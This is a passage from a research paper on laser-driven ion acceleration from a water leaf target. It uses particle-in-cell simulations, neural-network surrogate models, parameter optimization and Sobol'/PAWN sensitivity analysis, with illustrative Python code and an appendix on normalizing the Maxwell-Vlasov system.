relative behavior of the cut-off energies can still be taken into account, but the absolute value is overestimated. This overestimation is predictable and when applied makes the models directly comparable. Lecz et al. Lecz et al. (2009) have shown that the acceleration time \(t_{\text{acc}}\) cuts off the spectrum, such \begin{table} \begin{tabular}{c c c c c c} \hline \hline No & & Attribute & Sign & Range & Units \\ \hline 1 & Laser & Energy & \(E_{\text{L}}\) & [0.001, 50] & J \\ 2 & Laser & Focus-FWHM & FWHM & [2,20] & \(\,\text{\SIUnitSymbolMicro m}\) \\ 3 & Laser & Pulse length & \(\tau_{\text{L}}\) & [15, 150] & fs \\ 4 & Laser & Polarization & & \{s, p\} & \\ 5 & Laser & Incidence angle & \(\theta_{\text{L}}\) & [0, 85] & \(\,\text{\SIUnitSymbolMicro o}\) \\ 6 & Laser & Wavelength & \(\lambda_{\text{L}}\) & [550, 1100] & nm \\ 7 & Target & Thickness & \(d_{\text{T}}\) & [0.6, 3] & \(\,\text{\SIUnitSymbolMicro m}\) \\ 8 & Target & Mixture & Mix & [0, 100] & \(\,\text{\SIUnitSymbolMicro\%}\) \\ 9 & Target & Oxygen Charge & \(Z_{\text{eff}}\) & \{7, 8\} & \\ \hline \hline \end{tabular} \end{table} Table 1: Table of the physical parameters that were used for sampling of the input files to the 1.5D PIC simulations. Mixture defines the percentage of hydrogen substituted by deuterium. that it is a good approximation of 2D simulations. The simulations have been verified with experiments as well, which have shown that the bias can be mitigated. Furthermore, Sinigardi et al. [28] have shown further scalings between 2D and 3D cutoff energies. Taking both arguments into account we can deduce, that there is a constant scaling factor from 1D to real-world experiments and also to 3D simulations. Similarly, because of the lack of transversal particle movement, we cannot evaluate divergence opening angles in a 1D simulation. 
#### ii.1.6 Data Discussion by Example

We display an example of the spatial distribution from the simulations in Figure 3. An example of the energy spectrum is already displayed in Figure 1. Firstly, in this simulation, we assumed that the target consists of regular water and is fully ionized by the implied laser pre-pulse. Thus, the three species (\(\mathrm{e}^{-}\), \(\mathrm{H}^{+}\), and \(\mathrm{O}^{8+}\)) are initialized with a density ratio of \(10:2:1\), respectively, such that overall neutrality is conserved. We display the species' positions at \(t=t_{\mathrm{acc}}\) in Figure 3. In this simulation the laser incidence angle is \(0^{\circ}\), the target thickness is \(2\,\mathrm{\SIUnitSymbolMicro m}\) and the dimensionless laser amplitude is \(a_{0}=20\). We observe the two ion species, \(\mathrm{H}^{+}\) and \(\mathrm{O}^{8+}\), at \(t=t_{\mathrm{acc}}\). The figures show that the species have different positions at the measured time, which means that the species are accelerated separately by the sheath field. The ion front position at the acceleration time varies between the species due to their different charge and mass values, as mentioned in section II.1. Calculating the expected variation, following the relation from Huebl et al., for only fully ionized oxygen and hydrogen present, yields a scaling factor of \(x_{\mathrm{F,sim}}^{\mathrm{O}^{8+}}/x_{\mathrm{F,sim}}^{\mathrm{H}}\approx 0.68\). The corresponding factor from Figure 3 is \(x_{\mathrm{F,sim}}^{\mathrm{O}^{8+}}/x_{\mathrm{F,sim}}^{\mathrm{H}}\approx 0.67(1)\), where the uncertainty results from the binning. We can see that the general TNSA mechanism is still applicable. Although the dynamics of the different particle species with each other are more complex, as we will see later, the general behavior appears to follow classical TNSA theory. This is supported by the kinetic energy spectra of the ion species after acceleration, an example of which is shown in Figure 1. The figure shows the energy spectra of hydrogen and oxygen ions, along with Mora's predicted ideal curve.

### Deep Learning Application

We have to correlate the different simulations with each other and find relations and interpolations to allow for an optimization of the full setup. We decided to use a neural network approach with fully connected feedforward topologies and built the networks in Keras [29] running inside TensorFlow 2 [30]. For hyperparameter tuning, we used the Keras Tuner module [31].

#### ii.2.1 Model Training

To predict a particle spectrum, two models are needed. The _spectrum_ model continuously maps {[physical parameters]} = \(\{E,\mathrm{mix},E_{\mathrm{L}},r_{\mathrm{L}},\tau_{\mathrm{L}},s/\mathrm{p}\text{-pol},\theta_{\mathrm{L}},\lambda_{\mathrm{L}},d_{\mathrm{T}}\}\) onto \(\ln\left(\frac{\mathrm{d}n}{\mathrm{d}E}(E)\right)\), while a second _cutoff_ model only predicts the maximum energy (i.e. when to cut off the continuous spectrum from the first model). We trained a reduced model pair, not taking deuterons into account, for regular \(\mathrm{H}_{2}\mathrm{O}\), and a full model pair containing different ratios between \(\mathrm{H}_{2}\mathrm{O}\) and \(\mathrm{D}_{2}\mathrm{O}\). The dedicated features of the PIC simulation can be seen better with the reduced model. We assume that this is a result of the lower number of input dimensions and therefore of the differing degrees of generalization.
We essentially think of the energy spectrum as the graph of a continuous function \(f\): the first model maps {\(x,\mathrm{[system\ parameters]}\)} to \(f(x)\), while the second model predicts the point \(x\) at which the graph gets cut off. Details about the training parameters and the procedure are given in Appendix E. The reduced spectrum model has 6 hidden layers (\(x\to 320\to 288\to 288\to 256\to 256\to 320\to 1\)), while the full spectrum model has 11 hidden layers with 460 neurons each. The cutoff models both have 8 hidden layers (\(x\to 320\to 284\to 288\to 512\to 32\to 480\to 512\to 32\to 1\)). It is worth noting that the input dimension of the reduced spectrum model is one less than that of the full spectrum model, since it does not include the mix parameter. All networks were fully connected architectures with ReLU activations on their hidden layers. We will now briefly discuss and evaluate the trained models:

Reduced Model Pair: The precision of the cutoff models, which attempt to map {[physical parameters]} onto \(E_{\mathrm{max}}\), can be estimated rather easily. For the reduced problem, the model achieved a mean squared error of \(8.93\,\mathrm{MeV}^{2}\) on validation data (cf. Appendix E), meaning the average error on the prediction of the hydrogen spectrum's maximum energy is projected to be around \(\pm 2.99\,\mathrm{MeV}\). To more intuitively evaluate the reduced spectrum model's predicting capabilities and potential shortcomings, ten simulations with equal parameters (except for the random seed) were computed such that their hydrogen ion energy spectra could be compared to the predicted spectrum of the model. A plot of all the spectra is shown in Figure 4. The overall agreement of the model with the simulations is evident. The maximum energy predicted by the cutoff model falls centrally between the maximum energies of the ten simulations, only differing from the simulation average by \(0.2\,\mathrm{MeV}\). Looking at more intricate features of the simulation spectra, however, it is clear that the model possibly generalized slightly too much. At around \(10\,\mathrm{MeV}\) a dip, possibly due to multi-species effects, can be observed in most of the simulations and yet is barely present in the model prediction. Generally, the fluctuations in the simulation spectra are greatly reduced in the spectrum predicted by the neural network. A reason for this is likely the sheer vastness of differing spectra the model was trained on. Since the parameter space for the training simulations was so large, the model had to generalize to many very different output spectra.

Figure 3: Example PIC simulation of a water leaf target TNSA experiment. The plot shows the particle distribution at the previously proposed acceleration time \(t_{\mathrm{acc}}\) (Eq. (5)).

Full Model Pair: The full model pair was trained in exactly the same way as the reduced model pair, but with an additional parameter and a larger dataset. The full cutoff model converged with a mean squared error of \(7.25\,\mathrm{MeV}^{2}\) on validation data, resulting in a prediction error of \(\pm 2.7\,\mathrm{MeV}\) for the maximum energy of the hydrogen spectrum (cf. Appendix E). Again, as noted above, the sensitivity of the spectrum model is more complicated to estimate. In Figure 5, we can see that both numerical models, the full and the reduced model, deviate from one another slightly, even if the mixture is set to zero. This is expected behavior, since there is a statistical variation in the training of neural networks.
Important to note is the deviation in the spectra for different mixture ratios. An influence of the mixture parameter on the spectrum is visible, and it can be used to tune the spectrum. The behavior of the full spectrum model is the same as that of the reduced spectrum model presented in Figure 4: the model generalizes to a certain degree and has an uncertainty of a few MeV for the cut-off energy.

#### ii.2.2 Model Efficiency

Calling the models in a Python code environment is similar to calling any other function and takes around \(20\,\mathrm{ms}\) on a personal laptop. This time is in stark contrast to the four hours on 16 CPUs taken to run a similar 1D PIC simulation on the HPC cluster. To put this in perspective, we can run inference on the models roughly \(720\,000\) times in the time one PIC simulation takes to compute. We made other attempts at fitting the regression problem using various kernel combinations and Gaussian Process Regression [32]; however, they never produced energy spectrum predictions that came close to the neural network prediction seen in Figure 4, usually being off from the simulations by orders of magnitude. As expected, the adaptability of modern machine learning methods such as neural networks stands out from other regressors.

Figure 4: Reconstructed hydrogen ion energy spectra of ten simulations differing only in their random seed. The energy spectrum prediction by the trained neural network model is indicated with a red dashed line, while the average of the simulations is indicated by the blue dotted line. The curve is obtained from the reduced continuous model and is cut off at the maximum energy determined by the maximum energy model.

Figure 5: Model comparison for hydrogen spectra with a reference PIC simulation. Dashed lines give the result for the full model, the number indicates the value for the mixture parameter. The PIC reference (for mixture = 0) is displayed with a solid line and the reduced model with a dotted line.

## III Application of the model

With a trained surrogate in hand, we were able to take advantage of the model to perform a numerical optimization of an experiment as well as evaluate our models' interpretability.

### Optimization of Parameters for Laser Plasma Interactions

In this section, we optimize a TNSA experiment with a water leaf target. We aim to find an ideal set of laser and target parameters and apply the previously obtained reduced machine learning model pair. We chose base parameters from laser systems that have a proven repetition rate of at least \(1\,\mathrm{Hz}\): Ti:Sa lasers with a central wavelength of \(800\,\mathrm{nm}\) and p-polarized laser light. Exemplary systems would be the VEGA-3 laser at the Centro de Láseres Pulsados (CLPU) in Salamanca, Spain [33] or the DRACO laser at the Helmholtz-Zentrum Dresden-Rossendorf [34]. Following the procedure in this section, the model can also be applied to any other system, if its parameters lie inside the minimal and maximal physical parameters of our model (see Table 1). If the system's parameters are not included, our model could be expanded by retraining with additional data, using transfer learning [35], or other modern domain adaptation methods [36]. The assumed initial parameters of the laser system are stated in Table 2. In this section, we investigate two different optimization goals. The first goal is to find the maximum cut-off energy, while the second goal is to maximize the laser energy deposition into the plasma.
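Both optimization goals require evaluating the surrogate pair many times. As a rough sketch of how a full spectrum can be assembled from the two reduced models, assuming the trained networks have been saved to disk (the file names, the input feature order, and the scaling of the energy feature to the stored \([0,1]\) axis are illustrative assumptions, not the exact implementation used in this work):

```python
import numpy as np
from tensorflow import keras

# Hypothetical file names for the trained reduced model pair.
spectrum_model = keras.models.load_model("reduced_spectrum_model.h5")
cutoff_model = keras.models.load_model("reduced_cutoff_model.h5")

def predict_spectrum(params, n_points=100):
    """params: scaled physical parameters of the reduced model (no mixture parameter)."""
    params = np.asarray(params, dtype=np.float32)
    # The cutoff model maps the physical parameters directly onto E_max.
    E_max = float(cutoff_model.predict(params[None, :], verbose=0)[0, 0])
    # The spectrum model additionally takes the (normalized) energy as its first feature.
    E_norm = np.linspace(0.0, 1.0, n_points, dtype=np.float32)
    X = np.column_stack([E_norm, np.tile(params, (n_points, 1))])
    ln_dn_dE = spectrum_model.predict(X, verbose=0).ravel()
    # Exponentiate and re-scale the energy axis by the predicted cut-off energy.
    return E_norm * E_max, np.exp(ln_dn_dE)
```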
As mentioned, we assumed the polarization and central laser wavelength as fixed but otherwise allowed all parameters to change, as long as they stayed within the given physical constraints. Since the obvious solution to maximizing output energy is to maximize input energy, the optimizations were computed under the constraint of a constant dimensionless laser amplitude \(a_{0}\). This ensures optimization by exploiting complicated relationships between the physical parameters of the system, a task that can only feasibly be solved with a rapidly callable model. We implemented the optimization utilizing the _SciPy_ Python library [37] and the Byrd-Omojokun algorithm [38] included in its scipy.optimize.minimize routine. The Byrd-Omojokun algorithm allows us to include both the boundary conditions according to Table 1 and the equality constraint of constant \(a_{0}\), to leverage the aforementioned non-trivialities of the system. The optimized parameters are displayed in Table 2. The optimizer seems to have taken advantage of incidence-angle-dependent absorption effects such as resonance absorption. Additionally, by dramatically increasing the laser focus while simultaneously decreasing the laser power (energy over time), the maximum ion energy could be optimized without changing the dimensionless laser amplitude \(a_{0}\). Overall, the optimizer was able to increase the maximum ion output energy by a factor of roughly 4. The hydrogen energy spectra for these optimized parameters as well as for the initial parameters are depicted in Figure 6. A more intricate measure of a TNSA experimental system is the laser-ion energy conversion efficiency, i.e. the measure of how much of the laser's input energy gets transported into the accelerated particles. We thus consider the optimization of the ratio of the total kinetic energy of the ions \(E_{\mathrm{H}}\) to the laser pulse energy \(E_{\mathrm{L}}\): \[\operatorname*{arg\,max}_{x\in\{\mathrm{params}\}}\frac{E_{\mathrm{H}}(x)}{E_ {\mathrm{L}}}=\operatorname*{arg\,max}_{x\in\{\mathrm{params}\}}\frac{1}{E_{ \mathrm{L}}}\cdot\int_{0}^{E_{\mathrm{max}}}\frac{\mathrm{d}N}{\mathrm{d}E} \cdot E\,\mathrm{d}E\;, \tag{6}\] where \(\frac{\mathrm{d}N}{\mathrm{d}E}(E,x)\) and \(E_{\mathrm{max}}\) are given by the neural network models, and \(\{\mathrm{params}\}\) is the set of all parameter combinations within the ranges specified in Table 1. It is important to note that the Smilei output gives \(\frac{\mathrm{d}n}{\mathrm{d}E}\), which has to be scaled by a unit volume \(V\) to arrive at the expression needed. For further explanation of how to arrive at the above integral term we refer to Appendix D. Here, we also allow the variation of the laser energy \(E_{\mathrm{L}}\), increasing the complexity of the problem. The optimization described in Eq. (6) was carried out by solving the numerical integral using the composite trapezoidal rule and once again employing the Byrd-Omojokun algorithm. As seen in Table 2, despite having a slightly lower maximum ion energy than in the first optimization task, the calculated energy conversion efficiency is more than five times greater. This gives a strong indication that laser coupling into the target in a laser-plasma experiment depends on the physical parameters of the system in a highly non-trivial way.
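A minimal sketch of this procedure, built on the predict_spectrum helper sketched above, could look as follows. SciPy's trust-constr method contains the Byrd-Omojokun approach for the equality-constrained subproblems; the a0(x) expression, the parameter packing, and the initial values are simplified placeholders rather than the exact implementation used in this work.

```python
import numpy as np
from scipy.optimize import minimize, NonlinearConstraint

# Free parameters x = [E_L / J, FWHM / um, tau_L / fs, theta_L / deg, d_T / um];
# wavelength (800 nm) and p-polarization stay fixed. Bounds follow Table 1.
bounds = [(0.001, 50.0), (2.0, 20.0), (15.0, 150.0), (0.0, 85.0), (0.6, 3.0)]
x0 = np.array([30.0, 20.0, 30.0, 12.2, 2.0])      # initial parameters as in Table 2

def pack_parameters(x):
    """Assemble the scaled model input vector (placeholder scaling by the range maxima)."""
    E_L, fwhm, tau_L, theta_L, d_T = x
    return [E_L / 50.0, fwhm / 20.0, tau_L / 150.0, 1.0, theta_L / 85.0, 800.0 / 1100.0, d_T / 3.0]

def a0(x):
    """Dimensionless laser amplitude (illustrative scaling a0 ~ sqrt(E_L / (tau_L * FWHM^2)))."""
    E_L, fwhm, tau_L, _, _ = x
    return np.sqrt(E_L / (tau_L * fwhm**2))

def neg_E_max(x):
    """Objective 1: maximize the predicted cut-off energy."""
    E, _ = predict_spectrum(pack_parameters(x))
    return -E[-1]

def neg_conversion_efficiency(x):
    """Objective 2: maximize Eq. (6), evaluated with the composite trapezoidal rule."""
    E, dn_dE = predict_spectrum(pack_parameters(x))
    return -np.trapz(dn_dE * E, E) / x[0]

keep_a0 = NonlinearConstraint(a0, a0(x0), a0(x0))  # equality constraint: a0 fixed at its initial value
result = minimize(neg_E_max, x0, method="trust-constr", bounds=bounds, constraints=[keep_a0])
print(result.x, -result.fun)
```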
\begin{table} \begin{tabular}{c c c c c c} \hline No & Attribute & Initial & Optimized & Optimized & Units \\ & & & (\(E_{\mathrm{max}}\)) & (\(E\)-conversion) & \\ \hline 1 & Laser energy & 30 & 6.6 & 1.4 & J \\ 2 & Focus-FWHM & 20 & 4.2 & 2 & \(\mathrm{\SIUnitSymbolMicro m}\) \\ 3 & Pulse length & 30 & 149.9 & 137.6 & fs \\ 4 & **Polarization** & **p** & **p** & **p** & \\ 5 & Incidence angle & 12.2 & 32.2 & 29.3 & \({}^{\circ}\) \\ 6 & **Wavelength** & **800** & **800** & **800** & **nm** \\ 7 & Thickness & 2 & 3.0 & 3.0 & \(\mathrm{\SIUnitSymbolMicro m}\) \\ \hline & \(E_{\mathrm{max}}\) & 13.8 & 51.5 & 51.2 & MeV \\ & \(\eta_{\mathrm{conv}}\) & 1.0 & 7.8 & 41.3 & \\ \hline \end{tabular} \end{table} Table 2: Table of the physical parameters to be optimized for the laser system. Both initial and optimized values are shown. Rows in bold remained fixed during optimization. The dimensionless laser amplitude \(a_{0}\) also remained fixed during optimization to encourage the convergence towards non-trivial parameter combinations. \(\eta_{\mathrm{conv}}\) is a measure for energy conversion efficiency (see Eq. (6)), normalized to the initial parameter case.

### Sensitivity Analysis

Artificial neural networks are generally difficult to interpret, which is a drawback we have to accept. Nevertheless, the importance of specific parameters for a model can be evaluated. One way to quantify the impact of a model's input parameters on its output is to use variance-based global sensitivity analysis, also known as the Sobol' method. The corresponding sensitivity metrics are known as _Sobol' indices_ [39; 40; 41]. The Sobol' indices are calculated by Monte Carlo sampling of parameters and corresponding model outputs. This method is used to apportion the variance of the output to the inputs and their combinations. The number of evaluations of our model is \(N\times(2D+2)\), where \(D\) is the number of input features and \(N\) is the number of samples drawn. \(N\) is ideally selected as a power of 2; we selected \(2^{18}=262\,144\) drawn samples. We used the PAWN method [42] for a second sensitivity analysis to complement the Sobol' method, due to the latter's shortcomings for higher-order interactions of the input features. The PAWN method uses a different approach for cases in which the variance might not be a good measure for the outcome of a system. It utilizes the traits of the cumulative distribution functions, with Monte Carlo sampling similar to that used for the Sobol' indices, and thus provides a complementary way to determine the sensitivity of a model. A combination of these two methods was also proposed by Baroni et al. [43].

### Reduced Model

The reduced cutoff model has 7 input features which are mapped to 1 output prediction for the maximal energy. Our results of the Sobol' analysis for the reduced H\({}_{2}\)O-only model are given in Figure 7. The larger the value of a Sobol' index, the more influence the corresponding parameter has on the result. The total Sobol' indices, normally referred to as \(S_{T}\), give a measure of the total importance of the given features. The total Sobol' indices can neither describe how much of the variance is attributed to which combination of parameters, nor are they normalized for the total expression. This is due to multiple counting of effects: e.g. if there is a second-order contribution for \(\Theta_{L}\) and \(r_{L}\), then this contribution is added to both of the values in the total representation.
It doubles the counting for the second order, triples it for the third order, and so on. Due to this complication, the determination of higher-order dependencies makes it necessary to display the first- and second-order Sobol' indices, as done in Figure 7 (b). The values are displayed in a matrix, such that the interaction between \((x_{i},y_{j})\) can be read off. The first-order Sobol' indices are shown on the main diagonal (\(x_{i}=y_{j}\)). It is evident from the plot that the sum does not add up to 1, leaving approximately 21 % of the data variance unexplained. The consequence of this is that even higher-order interactions are necessary to fully explain the variation in our model. A full calculation of higher orders has been omitted, as it was deemed unfeasible due to the extreme computational cost for higher dimensions. The results of the PAWN method are displayed in Figure 8. PAWN can only give us a measure of the full importance of the individual parameters. A subsequent division into main effects and higher orders is not possible. The importance ranking from PAWN does not entirely match the order found by the Sobol' method but is rather close. Both are listed in Table 3. If not the total, but the sum of first- and second-order Sobol' indices is taken, then the first two features change places.

\begin{table} \begin{tabular}{c c c} \hline \hline Importance & Sobol’ & PAWN \\ \hline 1 & \(r_{L}\) & \(\Theta_{L}\) \\ 2 & \(\Theta_{L}\) & \(r_{L}\) \\ 3 & \(E_{L}\) & \(E_{L}\) \\ 4 & \(\tau_{L}\) & \(\tau_{L}\) \\ 5 & \(\lambda_{L}\) & \(\lambda_{L}\) \\ 6 & \(d_{T}\) & \(d_{T}\) \\ 7 & Pol & Pol \\ \hline \hline \end{tabular} \end{table} Table 3: Importance ranking of the model parameters as calculated by the Sobol’ and PAWN methods.

Figure 6: Energy spectra of H-ions for a TNSA water leaf target experiment using both the initial VEGA-3 parameters as well as parameters optimized with respect to the maximum ion energy. Spectra predicted by the neural network model and spectra from a 1D PIC simulation are shown. The parameters are given in Table 2.

The sensitivity analyses thus suggest that higher-order interactions are important in this model and a simple optimization (e.g. maximizing only one quantity) is not sufficient. Our previously presented optimizations take this implicitly into account. Furthermore, the incidence angle and the irradiation area appear to be important. The high influence of the angle \(\Theta_{\mathrm{L}}\) is expected, considering laser absorption mechanisms, and is faithfully implemented into the 1D simulation space using the Lorentz-boosted geometry (see Appendix C). While the third quantity, the laser energy, directly scales the laser's dimensionless amplitude \(a_{0}\), the influence of the irradiation radius \(r_{\mathrm{L}}\) is more difficult to understand. The irradiation area is not directly represented in a 1.5D PIC simulation. However, since \(a_{0}\) is dependent on \(r_{\mathrm{L}}\), an indirect influence is included.

### Full Model

Running the same analysis for the full cutoff model, including the mixture parameter, yields the results given in Figure 9 and Figure 10. As can be seen in the display of the data, the mixture has, according to the Sobol' analysis, minimal if not zero influence on the maximum energy of the hydrogen component, while the PAWN analysis attributes a higher influence to it. Furthermore, the variance of the output can be explained better in this model than in the reduced model, although the geometry did not change.
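For reference, an analysis of this kind can be reproduced with the SALib Python package; our use of SALib here is an assumption, as the text does not prescribe a particular implementation. The sketch below follows the sampling scheme described above for the reduced cutoff model (\(D=7\), \(N=2^{18}\) base samples, i.e. \(N\times(2D+2)\approx 4.2\) million model evaluations) and assumes the cutoff_model from the earlier sketch; the bounds, the treatment of the polarization as a numeric feature, and the input scaling are illustrative simplifications.

```python
import numpy as np
from SALib.sample import saltelli
from SALib.analyze import sobol

problem = {
    "num_vars": 7,
    "names": ["E_L", "r_L", "tau_L", "pol", "theta_L", "lambda_L", "d_T"],
    "bounds": [[0.001, 50], [2, 20], [15, 150], [0, 1], [0, 85], [550, 1100], [0.6, 3]],
}

# Saltelli sampling produces N * (2D + 2) parameter sets when second-order indices are requested.
X = saltelli.sample(problem, 2**18, calc_second_order=True)

# cutoff_model: the trained Keras cutoff network; inputs are scaled by their range maxima here.
Y = cutoff_model.predict(X / np.array([50, 20, 150, 1, 85, 1100, 3]), verbose=0).ravel()

Si = sobol.analyze(problem, Y, calc_second_order=True)
print(Si["S1"])   # first-order indices (main diagonal of Figure 7 b)
print(Si["S2"])   # second-order index matrix
print(Si["ST"])   # total indices (Figure 7 a)
```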
### Sensitivity Analysis Discussion

We performed a sensitivity analysis on our models and were able to evaluate the importance of the different parameters. We found evidence that the model describing the laser-plasma system is highly non-linear. It should be noted that a deep learning model approximates the physical system very well. It does not, however, provide a closed-form solution for the underlying physics, which would require further theoretical work. The models apply regression to the simulated data and as such are able to reproduce a mean curve for the data, which is for example displayed in Figure 6 or in Figure 4. The spectrum models take the energy bin value into account and predict the continuum of accelerated ions. This means that the dependency on the bin's energy would be included as well. An explainable analysis taking all energy bin values into account then becomes infeasible, as each bin would require a separate Sobol'/PAWN analysis.

Figure 7: Sobol’ sensitivity analysis results showing the influence of various physical parameters on the cut-off energy of H-ions for a TNSA water leaf target experiment, for the reduced model utilizing only the H\({}_{2}\)O data. Errors are given at the 95 % confidence level.

Figure 8: PAWN indices for the reduced model as a measure for parameter importance. Boxes consist of the lower uncertainty value, minimum, median, maximum, and upper uncertainty value. The numerical value given is the median.

The cut-off energy of a TNSA spectrum is the main parameter investigated in the literature, which is for example analyzed by Zimmer et al. [15]. We have seen that we can get similar results to Zimmer et al. for the cut-off energy dependencies. We see from the Sobol' analysis that several parameters are of importance; therefore, having only a single parameter to describe the cut-off is not sufficient. Since the second-order Sobol' indices are not zero, we have to take them into account as well. Since neither model explains the cut-off variation close to 100 % when only 1st- and 2nd-order variations are taken into account, we can conclude that the calculated models require consideration of even higher-order variations to describe an additional 10 %-20 % of the cut-off variation. Such a large reliance on higher-order interactions implies that simple scaling models are not ideal for optimizations, since these effects are not taken into account. A model capable of approximating highly nonlinear effects, such as our neural network models, should thus be preferred. The Sobol' indices decompose the function into a unique space [39]; this could be used to construct a polynomial chaos expansion [44] polynomial from it. This polynomial can describe the same amount of variation as indicated by the first- and second-order Sobol' indices. It is therefore neither a complete representation of our network-based models nor is it physically interpretable.

### Interpretations

Two major observations from the numerical study are of interest for the understanding of the modeled system. The first observation is the deviation from the exponential Mora-like shape towards the plateau-like features as presented in Figure 1. An explanation of this effect is the particle-particle interaction inside the expanding plasma. The driver of this effect is the higher-mass particle species (heavy ions), which is accelerated later than the lower-mass particle species (protons). Heavy ions, with their higher inertia, co-propagate with lower-energy protons and interact with them via the Coulomb force.
Due to the higher inertia of the heavy ions, the protons are pushed away from them and are accelerated as a result. This effect is especially highlighted by 1D PIC simulations, since no transverse particle movement is allowed. For higher-order dimensions [10] or experimental data [21], the effect is less dominant and the transitions are smoother.

Figure 9: Sobol’ sensitivity analysis results showing the influence of various physical parameters on the cut-off energy of H-ions for a TNSA water leaf target experiment, for the full model utilizing only the H\({}_{2}\)O data. Errors are given at the 95 % confidence level.

Figure 10: PAWN indices for the full model as a measure for parameter importance. Boxes consist of the lower uncertainty value, minimum, median, maximum, and upper uncertainty value. The numerical value given is the median.

If the particles are accelerated purely in the longitudinal direction, the divergence, which is given by the quotient of transversal and longitudinal momentum, can be reduced as well [45] (Eq. 2). The second observation is the large increase in energy absorption. The fraction of the energy passed onto the protons increases by a factor of about 42. As shown in the validation of the angular Lorentz boost scheme in Appendix C, a large increase in the absorption efficiency is a result of the angle-dependent resonance absorption. Indications for this are displayed in Figure 12 and Figure 14. The optimization algorithm exploits this behavior directly and therefore finds ideal angle values. However, there are at least two sides to this coin. The goal of the approach was to describe the TNSA process in a model which allows for the optimization of the output depending on the input. Approaching this directly and analytically is not possible. The time development of the governing Maxwell-Vlasov system, which is already a simplification using the collision-free case, cannot be solved in closed form. No exact relations for the cut-off energy, for example, have been derived so far. To get as close to this ground truth as possible, and to become able to extract it at a later point (with sufficient experimental data), a complex numerical model must be used. In our case, we adopted an artificial neural network approach. Artificial neural networks have desirable properties, as they have been shown to be universal function approximators [46]. However, the explainability of such complex models has been a critical point in their analysis for some time. The sensitivity analyses shown in section III.2 were used as a way to mitigate the complexity and gain some explainability of the model. The Sobol' indices method, or global variance-based method, underlines that the interaction of the different parameters is of importance. First and second order can only explain 79 % of the models' variance (Figure 7 b). This means that higher-order dependencies of the input parameters are necessary to explain a significant part (21 %) of the variance. The model cannot explain which higher-order effect, i.e. which combination of input quantities, is exactly responsible. The model's goal is to allow engineering optimization of the TNSA process. As a result of this optimization, this higher-order dependency was found.

## IV Conclusion

In this study, we modeled and optimized a possible TNSA experiment using a liquid leaf target by employing a combination of Particle-In-Cell simulations and deep learning.
In agreement with previous studies [10; 21], we have seen that the accelerated spectra from a multi-species target behave atypically in comparison to regular single-species TNSA as described by Mora. We developed surrogate models that replicate computationally costly PIC simulations using a deep learning approach. Deep learning is well-suited for optimizing complex systems. To take advantage of the trained models' inference speed, we used the Byrd-Omojokun algorithm to find an optimal parameter configuration for the system. This yielded a set of parameters that resulted in an optimal maximum hydrogen energy (8 times greater than with the initial parameters) and a set of parameters that resulted in an optimal laser energy conversion efficiency (41 times greater than with the initial parameters). We verified these findings with additional PIC simulations. We applied sensitivity analysis methods to evaluate the influence of the different parameters and successfully identified the relevant ones. We showed that such sensitivity analysis methods bear great potential for the understanding and quantification of physical dependencies when a closed-form solution is not known. The data-based model that we developed can be extended in the future to improve predictions and better understand the system. This can be achieved by incorporating future experimental data for the liquid jet.

## Author Declarations

The authors have no conflicts of interest to disclose.

## Data Availability Statement

Codes and data are available on request.

## Funding Statement

This work was funded by HMWK through the LOEWE center "Nuclear Photonics." This work is also supported by the Graduate School CE within the Centre for Computational Engineering at Technische Universität Darmstadt. The results presented here are based on simulations which were performed on the Virgo HPC cluster at the GSI Helmholtzzentrum für Schwerionenforschung, Darmstadt (Germany) in the frame of FAIR Phase-0.

## Acknowledgments

We would like to thank the Smilei team for providing valuable discussions. We would also like to thank Ion Gabriel Ion and Dimitrios Loukrezis for the helpful discussions on sensitivity analysis and the physical interpretation of artificial neural network models.

## Appendix A Units and Dimensionality

The simulations in this work were done using the particle-in-cell (PIC) method [47]. In the following section, we discuss the units and dimensions of the underlying Maxwell-Vlasov system and extract a lower number of relevant parameters which give valuable physical insight. This is important to understand why 9 parameters were used in our model. The basis we construct in this chapter can be represented by the physical parameters we sampled for the simulation part of our study.

### Basis Maxwell-Vlasov System and Normalization

TNSA requires a high-intensity laser pulse to heat plasma electrons up to MeV temperatures. We assume that the mean free path is larger than the target thickness and that the whole process can therefore be treated as collision-free [48; 49]. If the process is collision-free, it can be characterized by the Maxwell-Vlasov system of partial differential equations.
\[\nabla\cdot\vec{B} =0\] \[\nabla\cdot\vec{E} =\frac{\varrho}{\varepsilon_{0}}\] \[\nabla\times\vec{E} =-\frac{\partial\vec{B}}{\partial t} \tag{10}\] \[\nabla\times\vec{B} =\mu_{0}\vec{j}+\mu_{0}\varepsilon_{0}\frac{\partial\vec{E}}{ \partial t}\] \[0 =\frac{\partial f_{\alpha}}{\partial t}+\vec{v}_{\alpha}\cdot \nabla f_{\alpha}+q_{\alpha}\left(\vec{E}+\vec{v}_{\alpha}\times\vec{B} \right)\cdot\frac{\partial f_{\alpha}}{\partial\vec{p}}\] Solving these coupled equations efficiently with numerical methods makes it important to simplify relations. A normalization towards reference quantities is the first step: \[t^{\prime} =\frac{t}{\tau}\quad\text{where $\tau$ is the pulse length} \tag{11}\] \[r^{\prime} =\frac{r}{L}\quad\text{where $L$ is the focus size on the target}\] (12) \[p^{\prime} =\frac{p}{p_{0}}\quad\text{with}\quad p_{0}=\frac{eE_{0}}{ \omega_{\text{L}}}\] (13) \[\vec{E} =E_{0}\hat{\vec{E}}\] (14) \[\vec{B} =\frac{E_{0}}{c}\hat{\vec{B}} \tag{15}\] The charge distribution and the current can further be expressed by \[\varrho =\int\sum_{\alpha}f_{\alpha}\,\mathrm{d}^{3}\vec{p}\quad\text{and} \tag{16}\] \[\vec{j} =\int\sum_{\alpha}f_{\alpha}\vec{v}_{\alpha}\,\mathrm{d}^{3}\vec {p}\quad\text{with}\quad\vec{v}_{\alpha}=\frac{\vec{p}}{m_{\alpha}}\left(1+ \frac{p^{2}}{m_{\alpha}^{2}c^{2}}\right)^{-1/2}, \tag{17}\] where \(f_{\alpha}\) denotes the charge density. These can be normalized to a reference quantity as well by modifying \(f_{\alpha}\) accordingly shifting all dimensions into the new \(n_{\alpha}\) \[\hat{f}_{\alpha}=\frac{f_{\alpha}}{n_{\alpha}} \tag{18}\] ### Similitude Relations and Dimensional Reduction A system of equation can be simplified, by applying the Buckingham \(\Pi\) theorem [50]. This theorem allows us to take the dimensional quantities of a problem into account and find underlying dimensionless quantities which reflect the actual physical meaning. If the boundary and initial conditions are similar, then fewer dimensionless parameters than dimensional parameters can be found to fully represent this equation system. This implies that the shape of the electromagnetic wave, defined by \(\vec{B}\) and \(\vec{E}\), and the normalized charge density \(\hat{f}_{\alpha}\), have to be similar. Similar in this case means, that the governing function is the same except for some parameters which themselves can be derived using the Buckingham \(\Pi\) Theorem as well. To ensure similarity in this 